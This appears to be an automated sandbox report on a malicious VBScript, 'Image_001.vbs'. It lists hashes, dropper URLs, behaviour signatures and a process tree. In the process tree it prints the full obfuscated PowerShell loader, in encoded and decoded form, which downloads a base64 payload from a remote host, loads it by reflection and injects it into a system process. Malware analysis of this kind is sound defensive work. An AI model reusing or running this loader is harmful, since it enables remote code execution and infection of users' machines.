Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
18-09-2024 12:24
General
-
Target
Image_001.vbs
-
Size
507KB
-
MD5
369b2913abd7a1e2ecfeea185e737e61
-
SHA1
eb9431fc12b373c216e2c89af2cfdafdc5dae727
-
SHA256
8264386f0b6a0e9b2aa5f908dc3909f4b8a61b619edb269baf56bf7112ae100e
-
SHA512
e6e02f36641a087c1e437885c1b432e325f6b805ba371093302092912065515efe090121ea54f432ea6e23c466a44635c426efbaad2268cf03c251b0657f8f9b
-
SSDEEP
12288:bsD8YhlqjFf0pIWLNvd5/iaPr4/Is0en9sAWxihGmxLyKSHPh72RwsZIohgrVVMA:jcj6whXoTMA0t
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Image_001.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzB9dXJsJysnID0gJysneycrJzJ9aCcrJ3R0JysncCcrJ3MnKyc6JysnLy9pJysnYTYwMDEwMC51cy5hcmNoJysnaScrJ3YnKydlLm9yZy8nKycyJysnNC9pdGVtJysncycrJy9kZXRhaC1uJysnb3RlLXYnKycvRGV0YWhOb3RlVi50eHR7Mn0nKyc7ezAnKyd9YmFzZScrJzYnKyc0QycrJ29uJysndGVudCA9IChOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZScrJ24nKyd0KS5EJysnb3dubG8nKydhZFMnKyd0JysncmknKyduJysnZyh7JysnMH11cmwnKycpOycrJ3swfWJpbmFyeUNvbnRlbnQgJysnPSBbJysnU3lzJysndCcrJ2VtLkNvbnZlcnQnKyddOicrJzpGcm8nKydtQmFzJysnZTY0UycrJ3RyaW5nJysnKHswfWInKydhc2U2NENvbnQnKydlbnQpO3swfWFzc2VtYmx5ID0nKycgW1InKydlJysnZicrJ2xlY3RpbycrJ24uQXNzZW1ibHldOjonKydMb2FkKHswJysnfWInKydpbmFyeScrJ0NvbnRlbnQpO3swfXQnKyd5cGUgPSB7MCcrJ31hc3NlbWInKydseS5HZXRUeXBlKHsyfVJ1blBFLicrJ0hvbWV7Mn0pO3snKycwfScrJ21ldGhvZCA9JysnICcrJ3swfXR5JysncCcrJ2UuJysnR2UnKyd0TWUnKyd0aG9kJysnKCcrJ3snKycyfVYnKydBJysnSXsyfSk7eycrJzAnKyd9JysnbWUnKyd0aG9kLkludm8nKydrZSgnKyd7JysnMH1uJysndWxsLCBbb2JqZWN0WycrJ11dQCgnKyd7JysnMn01NScrJ2JhYycrJzA5MTgxZWUtNzAnKyc2Yi0nKydlMTA0LTJlMCcrJzItMjZiZjk2NicrJ2YnKyc9JysnbmUnKydrb3QnKycmYWlkZScrJ209JysndGxhP3R4dC5uaUInKycvJysnby9tb2MudG9wcycrJ3BwJysnYS4zMicrJ2UzNS15dGljLXInKydlYnknKydjL2IvMHYvbW9jLicrJ3NpcGFlbGdvJysnb2cuJysnZWdhcm8nKyd0c2VzJysnYWJlcmlmLy86c3B0dGh7Mn0gJysnLCB7Mn0nKycxezJ9ICwgJysnezJ9QzonKyd7MX1QJysncm9ncmFtRGF0YXsnKycxfXsyfSAsIHsyfWInKydhcnVydXJ1c3syfScrJyx7Mn1BJysnZGRJblByb2Nlc3MzMnsyfSwnKyd7Mn0nKyd7JysnMn0pKScpICAtRltjaGFyXTM2LFtjaGFyXTkyLFtjaGFyXTM5KSB8LiggJFNIZWxsaWRbMV0rJFNoZUxMSWRbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0}url'+' = '+'{'+'2}h'+'tt'+'p'+'s'+':'+'//i'+'a600100.us.arch'+'i'+'v'+'e.org/'+'2'+'4/item'+'s'+'/detah-n'+'ote-v'+'/DetahNoteV.txt{2}'+';{0'+'}base'+'6'+'4C'+'on'+'tent = (Ne'+'w-Object System.Net.WebClie'+'n'+'t).D'+'ownlo'+'adS'+'t'+'ri'+'n'+'g({'+'0}url'+');'+'{0}binaryContent '+'= ['+'Sys'+'t'+'em.Convert'+']:'+':Fro'+'mBas'+'e64S'+'tring'+'({0}b'+'ase64Cont'+'ent);{0}assembly ='+' [R'+'e'+'f'+'lectio'+'n.Assembly]::'+'Load({0'+'}b'+'inary'+'Content);{0}t'+'ype = {0'+'}assemb'+'ly.GetType({2}RunPE.'+'Home{2});{'+'0}'+'method ='+' '+'{0}ty'+'p'+'e.'+'Ge'+'tMe'+'thod'+'('+'{'+'2}V'+'A'+'I{2});{'+'0'+'}'+'me'+'thod.Invo'+'ke('+'{'+'0}n'+'ull, [object['+']]@('+'{'+'2}55'+'bac'+'09181ee-70'+'6b-'+'e104-2e0'+'2-26bf966'+'f'+'='+'ne'+'kot'+'&aide'+'m='+'tla?txt.niB'+'/'+'o/moc.tops'+'pp'+'a.32'+'e35-ytic-r'+'eby'+'c/b/0v/moc.'+'sipaelgo'+'og.'+'egaro'+'tses'+'aberif//:sptth{2} '+', {2}'+'1{2} , '+'{2}C:'+'{1}P'+'rogramData{'+'1}{2} , {2}b'+'arururus{2}'+',{2}A'+'ddInProcess32{2},'+'{2}'+'{'+'2}))') -F[char]36,[char]92,[char]39) |.( $SHellid[1]+$SheLLId[13]+'x')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5e2fc963b430452128cc81e4f4dda8710
SHA1ca830aaa24d0e12231ea0e6f401be647611135ac
SHA256a9086cfe7121e7167ef6c18986623e3be97427116b5c6e3a066e374a172bd601
SHA512e337517047aae309a7b92b8d1fcede94c3270dd09587116bc90082692db7516e8195b39bd478cbd328c8e334fa58a549cc3cbdc006901cf388eaf5fbfca4a579
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB